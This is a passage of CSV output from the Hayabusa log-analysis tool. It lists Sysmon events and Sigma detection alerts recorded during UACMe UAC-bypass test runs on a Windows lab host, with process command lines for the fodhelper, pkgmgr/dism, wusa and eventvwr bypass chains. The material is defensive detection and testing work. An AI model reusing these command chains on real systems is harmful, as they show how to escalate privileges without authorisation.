script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 